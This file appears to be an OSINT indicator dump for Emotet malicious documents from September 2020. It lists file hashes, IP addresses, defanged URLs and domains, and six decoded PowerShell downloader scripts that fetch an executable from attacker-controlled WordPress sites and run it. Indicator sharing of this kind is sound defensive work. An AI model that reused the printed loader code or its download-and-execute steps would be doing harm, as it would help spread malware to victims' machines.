Emotet_Doc_out_2020-09-22_16_13.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. 0375b4835fb4def35254dd37af3b71c8c92dbafb8af44ccf8f7ff85e3751ffb7
5. 8c3a4338d7f182b5a61fca23d6848bdf9a3bb775d6c5c938b82cfb845aec45a3
6. 35cde8868a2076e10e0dfddb3ec487a74ca52b6643cef4d514deb69d11e9edd5
7. c60660ab0787ad07d92caba8f19ce8fd7de59a44856d3c442a770672842f3ad4
8. e64bcab1a1f2160f9a78d618a0bea25b228470c38a589b537149a8abbc4401f7
9. f004c200aee13a599b9132f323cf3c1752babe33e106d55ef045391c394211a8
10. 292a48621b6f7863d1a7d04f25cd2c6ddbcbf5abac1282941d3ba20ae076b776
11. 292a48621b6f7863d1a7d04f25cd2c6ddbcbf5abac1282941d3ba20ae076b776
12. 5d9ea64e57564b3e412eb44aa61235c5b1cb4d677aa5089910f9a5f1c6e6b1bc
13. 5d9ea64e57564b3e412eb44aa61235c5b1cb4d677aa5089910f9a5f1c6e6b1bc
14. c8ec1b5a11693054c13c42e45d83be353dc88a30205b63b6e820c12c9b38a13f
15. c8ec1b5a11693054c13c42e45d83be353dc88a30205b63b6e820c12c9b38a13f
16. b2fdf39787d7404bc206d1a5ed3b41053eaa0c375641af699e74f70281097f29
17. b2fdf39787d7404bc206d1a5ed3b41053eaa0c375641af699e74f70281097f29
18. c19dd05cf11f244d0b2189ff9b5075a190c1a64d8c65dd5f47a65e3bb8c2b869
19. 9addba96a219cf69e04822cf43a65d6b7da0f848ac179d2276ef2a448ca362cb
20. 9addba96a219cf69e04822cf43a65d6b7da0f848ac179d2276ef2a448ca362cb
21. ed6598e7e6d37524439397ed78a735fe41117f47c0964cba780b5800d4eb5146
22. ed6598e7e6d37524439397ed78a735fe41117f47c0964cba780b5800d4eb5146
23. ba2753c69b06b5198fcc5ab9d75dd5760f634a64845c40f9d1518228e8611079
24. 061d0e30973bd296c440a37565de8038d2952e85e0800e599c4049fec446fd8d
25. 217d18116ca119751a9e29f6ed27a4fe97fe6fc8bfe088610cf7841c4fd8dab8
26. 7aa7d38a55d5f7d01ee40a977a2df63d0cd4c938482a2fba3c73e1844405a0fc
27. 90f5fcbadecf831b2ea1ad31be2ad24a539c2886611a270e23975355d3ba2692
28. fb7120cd04c6c488c5a564bb24d9d155389d7cb8a0293e552dd385110bc6ec9f
29. f574d141e50f5f004b6d5b2932ce746ef012404c5bf46933947ad0ce3b397665
30. 050935f49889548f87753aa002d3e6204e6b6ef7a540a5ca8111e9b5f5d275e2
31. b1b89eb23fc161742f78b19b454b7d0a3b657572a55212755323ccb39886d9e3
32. e5feef66c305d39b964ea0daecb60211c37c70d35ae53a638ac6a43c344abd4d
33. 4ea41230838a7c1fc89aa8cc3219dbc0640f6dc558b91cf9117815cea3b1480c
34. 570b9fbca778d14336e0e4f0af778c33c2da79f575e171fcb8f6ba01c135163b
35. 2f40f8c0127c5d28872650dc20bcd01845874f082242f1ead973adb422a7b377
36. 8d49090e5ad1ca487645e8dad8b6e90d267b4a7f5d4cdf4d9c4441d969f088ca
37. 821de39cb913b24cdd6d95facee8f4ce99d24f569e6e069a779893562486e536
38. 6b58f3d639dbfd3f04c2534bac10583c7e2d0ba1e88ef31ebe443fc18f409a76
39. 6b58f3d639dbfd3f04c2534bac10583c7e2d0ba1e88ef31ebe443fc18f409a76
40. 1b29befdf0bca8218c36edb5cab59349355ecbdc760f419096bed97f5630be14
41. f46d933cc794ec8f95dd03ddc687ee164ba570053e0d0813e8d79c4d09ab368d
42. 5113e330fdea6c93e3ef5a610817655f04d59be9bb5fa3a4f4167f8ccbb01d48
43. 2009f9056e90d2564b967fa225b898cbbdb0cd957efec3b1211b18925d410695
44. f482643e9c789b0358eca0cec6dd9523355bffb2da53b01de9027ace5430b3d0
45. 5d282237d6e5c0b30771b81556082a026563fc848280761cf0b375a39f36245f
46. 8be623528fb4fc5e2d55097ef418336596be88914357dc10877ff9db0826a918
47. f0dbc484997e20fe5db380cddafa06e0d939fe71ce91d0fe4ed65ebabcd06b3a
48. 2eafdbcf47ac1cf227443b62069f3222d350cd81096fe0f948887a741d32d7de
49. 2521f8a80c3d5dfb6d02974f29fbf398618f9cedc21a5009183aef65d1ef6904
50. bea38752f29488eceb11331cdd52a11f2eda1ac4a1d247e5769261e99b8d38c2
51. 4cf44fec1d562df92879e4f30d039d271d3178069c2bf587a080f9f0ed11c097
52. 1433b33836a5b9fd72cccccf1c7b9762f11647c7bc57b9dd43a15b56310055ce
53. 73952940eab75cb0f3ffdec59f7aedf9a2895246f7c82609505f3f62bcd66abc
54. d22885b2f130ce45979448850589d91285f8dc8a61a9ddf78ee7aa302b1d4d01
55. 302e8726fa91efa42546ebb326ec43baf90e3da145cd9a9e3e39a25e9949bbe3
56. 302e8726fa91efa42546ebb326ec43baf90e3da145cd9a9e3e39a25e9949bbe3
57. 193194a1f2cec3953fba2121f846171524d92ef27569d72e891d3a175cafa647
58. 193194a1f2cec3953fba2121f846171524d92ef27569d72e891d3a175cafa647
59. 782b420b0803c8a180a9bcc152c023b3a00a5a22bd923d0f646798c4b0af7ca2
60. 782b420b0803c8a180a9bcc152c023b3a00a5a22bd923d0f646798c4b0af7ca2
61. 4f8e5670cb71d357da7b7eb48753d60aee76b24e8ad9bf8c7908c6410b488b64
62. 4f8e5670cb71d357da7b7eb48753d60aee76b24e8ad9bf8c7908c6410b488b64
63. 83c6179da780f419a2c33e82aa72779368169c6dfa0c13b5e1301c3ad3d33baa
64. ca7549ac47fe8878435d685f43fefa878b106015da743a5ddfe694d36a0eec97
65. a7b027ef7df5c684b6d46a60b649ea3e752168cb1f514d5583921c1feaede17c
66. 700dfcd7a2a3ee3abdd98fa4a8497bb24736753955fe23c4a0714ae7fbe2ca41
67. fb4363c35de1a94b136b3550566e650f9e96b64af57fbd014d949565e36235ad
68. fb4363c35de1a94b136b3550566e650f9e96b64af57fbd014d949565e36235ad
69. 684d538530f6095356b8290993e828154398388f70e1ea9fbf5b6082ef911cbc
70. 684d538530f6095356b8290993e828154398388f70e1ea9fbf5b6082ef911cbc
71. 167a50633bd1e80ef6c145b0ad4f6142754304ba747eaf37f0dfb2599bf49876
72. 167a50633bd1e80ef6c145b0ad4f6142754304ba747eaf37f0dfb2599bf49876
73. d0777eaec82602de3cb84fc277f571987563c6da7e98f0426c67dfe95b9580ed
74. 5cc7d1e73511b36eb3ae34e14a8a6eb95e201da4e57a4c7cbb02f475bfe521e0
75. 06ae9d7036f2eab98389d37f9c78727563820bc3e43f8dfdb2493e93c4a4a743
76. 64a28ead161d7e6125bb0eb7e8fb2cfa83c18c53ba5b8c0b369f222bd4c28ad6
77. 71662eb323a9a4af953568b9ee749cabc486bbd0e17d2b0cf2d52ff88cf6bbaf
78. 37cfd631a84f8c6a37cf75bc776308cab50f97e915ddbebca7405e9b2abebdcd
79. 482b54b8d99750fad27a5d6131580e9639eb71432b6befb5dd5ca0b27f67881f
80. 013f49af6f7f5e1e34116aa22e1bc2ba4babbb2c0b0f97bf4da287ce88b16a16
81. 53ba841833e4a9acfb16fa855e6f616913dfd599db840ad5f7aba6635ebda0ae
82. 53ba841833e4a9acfb16fa855e6f616913dfd599db840ad5f7aba6635ebda0ae
83. e9325bf53bdb893300c9633950651c3ccae5cf1c4d9485bd9a51932bf3834eed
84. e9325bf53bdb893300c9633950651c3ccae5cf1c4d9485bd9a51932bf3834eed
85. 51ae65c1bfb9227a2a69b19041097b6323131a87f452e961d28d112302ec7203
86. b1a87efb52cb8e72a662e48033454ac0de75808fad6e51b8d0892931baa1dc9e
87. 9d69feedac414e2e1554965f077deb501f1f7a47ceb72ab2b68539c8314e602b
88. 5599e7ebf3dc1f2899eb3e9470f8a472d87feaabdcbd8d5db07c34cf1c6ceba5
89. d2ea12fefb301a8fca40a7bb452129cbe179e859d6ece374174e1c86964e9ce1
90.  
91.  
92. IPs:
93. 103.21.58.231
94. 103.53.43.93
95. 104.153.72.10
96. 104.18.37.227
97. 104.18.38.35
98. 104.18.39.35
99. 104.18.44.123
100. 104.18.45.123
101. 104.18.48.138
102. 104.18.49.138
103. 104.24.120.61
104. 104.24.121.61
105. 104.27.136.105
106. 104.27.137.105
107. 104.28.28.137
108. 104.28.29.137
109. 106.12.17.139
110. 116.202.234.171
111. 123.59.232.99
112. 134.122.112.132
113. 142.54.202.95
114. 144.202.34.33
115. 149.56.22.201
116. 157.175.3.229
117. 161.35.19.129
118. 162.144.90.127
119. 165.22.194.33
120. 167.86.66.95
121. 172.67.141.65
122. 172.67.146.133
123. 172.67.165.12
124. 172.67.191.58
125. 172.67.191.84
126. 172.67.200.61
127. 178.128.200.183
128. 180.101.45.198
129. 18.223.29.204
130. 185.143.233.5
131. 185.143.234.5
132. 188.68.47.69
133. 208.91.199.181
134. 34.83.139.14
135. 34.93.116.168
136. 35.232.214.226
137. 35.247.203.136
138. 40.84.232.28
139. 45.119.81.203
140. 45.32.136.161
141. 45.33.59.76
142. 49.235.92.117
143. 52.231.154.57
144. 52.35.48.190
145. 54.233.138.94
146. 63.250.36.225
147. 66.96.162.253
148. 68.183.81.190
149. 72.52.197.50
150. 82.223.27.124
151. 85.215.94.214
152. 85.95.237.88
153. 94.23.8.183
154.  
155.  
156.  
157. URLs:
158. hxxp://minershallmuseum.com/documents/D/
159. hxxp://injazjordan.com/moodle/Vh/
160. hxxps://site1.xyz/wp-admin/Y/
161. hxxp://2bstone.com/vr7tf0c/ZD/
162. hxxp://biology-360.com/wp-admin/hv/
163. hxxp://tez-tour.site/wp-content/9sB/
164. hxxp://iooe.cn/wp-content/hdO/."sP`lIT"[char]42;
165. hxxp://fulfillmententertainment.com/cgi-bin/jO/
166. hxxp://meadtimes.com/wp-content/VZrDrTw/
167. hxxp://pinturasydecoracionluis.com/wp-admin/fK3/
168. hxxp://oconsign.com/cgi-bin/koLViD/
169. hxxp://umapreowned.com/wp-admin/XF7RBbs/
170. hxxp://kitecorp.ca/wp-includes/kEI98N/
171. hxxp://moneyii.com/website/ddeoUDo/."s`PliT"[char]42;
172. hxxps://waytoger.com/wp-admin/w/
173. hxxps://jaguarssus.xyz/wp-admin/GfU/
174. hxxps://learnkalmar.com/wp-includes/VSZ/
175. hxxp://tiendapablus.net/cgi-bin/SIr/
176. hxxps://prsaze.com/wp-admin/7a/
177. hxxps://www.campuscamarafp.com/wp-admin/N/
178. hxxps://infolockerz.com/wp-content/x/."Spl`IT"[char]42;
179. hxxps://www.1plus-agency.com/tmp/nlr08Z0/
180. hxxp://winadev.com/uglot/iiClU/
181. hxxps://enews.enkj.com/wordpress/h62/
182. hxxps://apicosto.misco-furniture.com/dvzmj/0xm3yS/
183. hxxp://drbeatrice.com/wp-content/HSz/
184. hxxps://ienerpro.com/cgi-bin/VVwhOR/
185. hxxps://premierbarsamui.com/Irc/O/."s`plit"[char]42;
186. hxxps://eaglehatch.com/wp-content/TwA6w6/
187. hxxps://www.tiendajuanvaldez.com/wp-admin/igkf/
188. hxxps://aspeninstitute.es/catalogmap/fAatpjn/
189. hxxps://1horse.ir/wp-includes/7Ev/
190. hxxps://theshopclubs.com/wp-admin/7/
191. hxxps://eliteweb.cl/dev-area/6V/
192. hxxps://stockval.com.br/wp-admin/68K36/."SPL`IT"[char]42;
193. hxxp://amvp-py.com/amvp/r/
194. hxxps://dagranitegiare.com/wp-admin/d/
195. hxxps://emitt-tech.com/wp-admin/2qG/
196. hxxp://kvaser-microsite.tagsom.company/wp-includes/a/
197. hxxps://aravindhherbalstore.com/wp-admin/TPA/
198. hxxp://leo.jelct.com/wp-content/Hce/
199. hxxp://domiciliazione.org/wp/UT8/."sp`LIt"[char]42;
200.  
201.  
202. Domains:
203. minershallmuseum.com
204. injazjordan.com
205. site1.xyz
206. 2bstone.com
207. biology-360.com
208. tez-tour.site
209. iooe.cn
210. fulfillmententertainment.com
211. meadtimes.com
212. pinturasydecoracionluis.com
213. oconsign.com
214. umapreowned.com
215. kitecorp.ca
216. moneyii.com
217. waytoger.com
218. jaguarssus.xyz
219. learnkalmar.com
220. tiendapablus.net
221. prsaze.com
222. www.campuscamarafp.com
223. infolockerz.com
224. www.1plus-agency.com
225. winadev.com
226. enews.enkj.com
227. apicosto.misco-furniture.com
228. drbeatrice.com
229. ienerpro.com
230. premierbarsamui.com
231. eaglehatch.com
232. www.tiendajuanvaldez.com
233. aspeninstitute.es
234. 1horse.ir
235. theshopclubs.com
236. eliteweb.cl
237. stockval.com.br
238. amvp-py.com
239. dagranitegiare.com
240. emitt-tech.com
241. kvaser-microsite.tagsom.company
242. aravindhherbalstore.com
243. leo.jelct.com
244. domiciliazione.org
245.  
246.  
247. Decoded Base64 Powershell:
248. ����^�$Z5m4qap=Ziw_ks7;
249. &new-item $Env:UserpRoFiLe\AxmrHAT\J5cki19\ -itemtype dirECTorY;
250. [Net.ServicePointManager]::"sE`cuRI`Typ`RO`TOCol" = tls12, tls11, tls;
251. $Xn9t6jy = Quw2u4t;
252. $Dx053bg=Lztb872;
253. $Iybmx5m=$env:userprofile{0}Axmrhat{0}J5cki19{0}-f[ChaR]92$Xn9t6jy.exe;
254. $Fys0ote=X3yzehz;
255. $Djtxqrm=.new-object Net.WeBClieNt;
256. $Nlxtnia=hxxp://minershallmuseum.com/documents/D/
257. hxxp://injazjordan.com/moodle/Vh/
258. hxxps://site1.xyz/wp-admin/Y/
259. hxxp://2bstone.com/vr7tf0c/ZD/
260. hxxp://biology-360.com/wp-admin/hv/
261. hxxp://tez-tour.site/wp-content/9sB/
262. hxxp://iooe.cn/wp-content/hdO/."sP`lIT"[char]42;
263. $Hax4bv8=Aouv06o;
264. foreach$Ok2xn7j in $Nlxtnia{try{$Djtxqrm."Down`Load`FilE"$Ok2xn7j, $Iybmx5m;
265. $Vvs8lu8=Nd8ansd;
266. If .Get-Item $Iybmx5m."L`EnGTh" -ge 24468 {.Invoke-Item$Iybmx5m;
267. $I28j00x=O9a0t7c;
268. break;
269. $Y7tz473=Aj9z8vt}}catch{}}$Ivxdrs6=Wf3w8y_����^�$Eds_g9a=Rz7rfhd;
270. .new-item $env:USERPROfIlE\E5uHF3D\akvy3Ll\ -itemtype DIRECtOry;
271. [Net.ServicePointManager]::"SEcUr`I`TYPro`T`OCOL" = tls12, tls11, tls;
272. $Scffs6q = G7qa2o;
273. $N3owl5q=K2q_onr;
274. $H6rxvoe=$env:userprofile6MOE5uhf3d6MOAkvy3ll6MO."Re`pL`Ace"[cHAr]54[cHAr]77[cHAr]79,[sTRING][cHAr]92$Scffs6q.exe;
275. $G4etq7w=Vhoo76k;
276. $A2946xu=.new-object NEt.wEbCLIeNt;
277. $V4uwtkm=hxxp://fulfillmententertainment.com/cgi-bin/jO/
278. hxxp://meadtimes.com/wp-content/VZrDrTw/
279. hxxp://pinturasydecoracionluis.com/wp-admin/fK3/
280. hxxp://oconsign.com/cgi-bin/koLViD/
281. hxxp://umapreowned.com/wp-admin/XF7RBbs/
282. hxxp://kitecorp.ca/wp-includes/kEI98N/
283. hxxp://moneyii.com/website/ddeoUDo/."s`PliT"[char]42;
284. $Uo0h3lz=Fws1zhz;
285. foreach$Azqx6lv in $V4uwtkm{try{$A2946xu."Do`wnloAdf`ilE"$Azqx6lv, $H6rxvoe;
286. $Urhhx6j=Er4epbh;
287. If .Get-Item $H6rxvoe."LENG`Th" -ge 30645 {&Invoke-Item$H6rxvoe;
288. $Mg_pjw9=Mk5o8iw;
289. break;
290. $Pwpycm9=Hbltuhg}}catch{}}$Zjha1nt=Hdevpkj����^�$Mai3v3v=Cs7rz3l;
291. .new-item $enV:UsERPRoFIle\oqvI_4E\ZfI5CKX\ -itemtype direCtORy;
292. [Net.ServicePointManager]::"s`e`cUri`TypRO`TOcoL" = tls12, tls11, tls;
293. $P59vpaw = Jn7xvio0;
294. $Fsjrr5l=Wdp36n4;
295. $T4rsp1k=$env:userprofile{0}Oqvi_4e{0}Zfi5ckx{0} -F [ChAr]92$P59vpaw.exe;
296. $Qer9xvh=Sqzpask;
297. $G9o_ucj=.new-object NeT.weBClIENt;
298. $Qoorkwn=hxxps://waytoger.com/wp-admin/w/
299. hxxps://jaguarssus.xyz/wp-admin/GfU/
300. hxxps://learnkalmar.com/wp-includes/VSZ/
301. hxxp://tiendapablus.net/cgi-bin/SIr/
302. hxxps://prsaze.com/wp-admin/7a/
303. hxxps://www.campuscamarafp.com/wp-admin/N/
304. hxxps://infolockerz.com/wp-content/x/."Spl`IT"[char]42;
305. $Hcnjlrx=Ol5y73t;
306. foreach$O_lqcgq in $Qoorkwn{try{$G9o_ucj."D`ow`NLOadFi`Le"$O_lqcgq, $T4rsp1k;
307. $C30d8bc=Hp3af8g;
308. If .Get-Item $T4rsp1k."LENG`TH" -ge 27197 {&Invoke-Item$T4rsp1k;
309. $Vs3auuf=Unm2t00;
310. break;
311. $Rmitgzi=S071xuy}}catch{}}$M6cj2at=Uxez173����^�$Qck828v=Rhxdsoj;
312. &new-item $ENv:UseRPrOfilE\XB1rqMo\Cj2z2jP\ -itemtype DIrECTory;
313. [Net.ServicePointManager]::"Sec`U`Rit`YpR`OtoCoL" = tls12, tls11, tls;
314. $Mo60ckx = Tlylng;
315. $Kyr3l36=G_gmaa2;
316. $Tb_6ust=$env:userprofileX9BXb1rqmoX9BCj2z2jpX9B."R`E`plaCE"[CHAR]88[CHAR]57[CHAR]66,[strinG][CHAR]92$Mo60ckx.exe;
317. $Zrj5izk=Raw0pwd;
318. $Tj3a913=&new-object NEt.WEBclieNt;
319. $Zh9frnn=hxxps://www.1plus-agency.com/tmp/nlr08Z0/
320. hxxp://winadev.com/uglot/iiClU/
321. hxxps://enews.enkj.com/wordpress/h62/
322. hxxps://apicosto.misco-furniture.com/dvzmj/0xm3yS/
323. hxxp://drbeatrice.com/wp-content/HSz/
324. hxxps://ienerpro.com/cgi-bin/VVwhOR/
325. hxxps://premierbarsamui.com/Irc/O/."s`plit"[char]42;
326. $L37jjek=Vhpelbi;
327. foreach$Knouncx in $Zh9frnn{try{$Tj3a913."dOw`NloA`DFiLE"$Knouncx, $Tb_6ust;
328. $Z0y6dmb=Jrdlf7v;
329. If .Get-Item $Tb_6ust."lE`NGTh" -ge 32466 {&Invoke-Item$Tb_6ust;
330. $W7ifsd7=Oabkgzx;
331. break;
332. $N0r0ihe=E74a_u9}}catch{}}$Uiqg_0s=Uzumapg����^�$Seebx6u=Ml28ys9;
333. &new-item $eNV:uSeRProFiLE\gYr1jQK\kcQEFh5\ -itemtype DiReCtoRy;
334. [Net.ServicePointManager]::"secUrI`Typ`Ro`TO`CoL" = tls12, tls11, tls;
335. $Ahlat13 = Eaw3l8;
336. $K5bzk1a=Vo1mov1;
337. $Vdvcmge=$env:userprofile{0}Gyr1jqk{0}Kcqefh5{0} -F [ChAR]92$Ahlat13.exe;
338. $Jeai9zn=Xfo9evb;
339. $Jm10ei9=&new-object NeT.WeBcLIENt;
340. $Qwu2e0t=hxxps://eaglehatch.com/wp-content/TwA6w6/
341. hxxps://www.tiendajuanvaldez.com/wp-admin/igkf/
342. hxxps://aspeninstitute.es/catalogmap/fAatpjn/
343. hxxps://1horse.ir/wp-includes/7Ev/
344. hxxps://theshopclubs.com/wp-admin/7/
345. hxxps://eliteweb.cl/dev-area/6V/
346. hxxps://stockval.com.br/wp-admin/68K36/."SPL`IT"[char]42;
347. $U42hvgk=Mh9t9gt;
348. foreach$T0t6q4x in $Qwu2e0t{try{$Jm10ei9."Dow`N`loadfIlE"$T0t6q4x, $Vdvcmge;
349. $Lejylyp=Mf3elc0;
350. If .Get-Item $Vdvcmge."Len`G`Th" -ge 24690 {.Invoke-Item$Vdvcmge;
351. $Luw6tlg=H213502;
352. break;
353. $Yramo0e=B2ppfop}}catch{}}$Sgtx8w9=B5a8z9x����^�$Ymhr2ut=B3lamaa;
354. &new-item $EnV:uSerpRoFile\hu0ls_L\tTVxmGD\ -itemtype dIrecTory;
355. [Net.ServicePointManager]::"sECU`R`ITyPrO`ToC`Ol" = tls12, tls11, tls;
356. $Hoq_mvj = N0_70cxdm;
357. $Mw06pel=Ban3z2a;
358. $Cyuieus=$env:userprofiledQGHu0ls_ldQGTtvxmgddQG."Re`pLa`Ce"[CHaR]100[CHaR]81[CHaR]71,\$Hoq_mvj.exe;
359. $G2yll2t=Dngiz8z;
360. $Omrkfl4=.new-object NET.WEbclIeNt;
361. $Buswp3a=hxxp://amvp-py.com/amvp/r/
362. hxxps://dagranitegiare.com/wp-admin/d/
363. hxxps://emitt-tech.com/wp-admin/2qG/
364. hxxp://kvaser-microsite.tagsom.company/wp-includes/a/
365. hxxps://aravindhherbalstore.com/wp-admin/TPA/
366. hxxp://leo.jelct.com/wp-content/Hce/
367. hxxp://domiciliazione.org/wp/UT8/."sp`LIt"[char]42;
368. $D6c9uim=Ru__p3k;
369. foreach$J3okp9n in $Buswp3a{try{$Omrkfl4."D`OWnl`oadfIlE"$J3okp9n, $Cyuieus;
370. $Vs58pbv=Cg1b9dd;
371. If .Get-Item $Cyuieus."lE`NG`TH" -ge 22846 {&Invoke-Item$Cyuieus;
372. $Gx5yd8a=Mw33tnn;
373. break;
374. $Yohc4zd=I6osljw}}catch{}}$Vzgfqv2=Ut0p4_u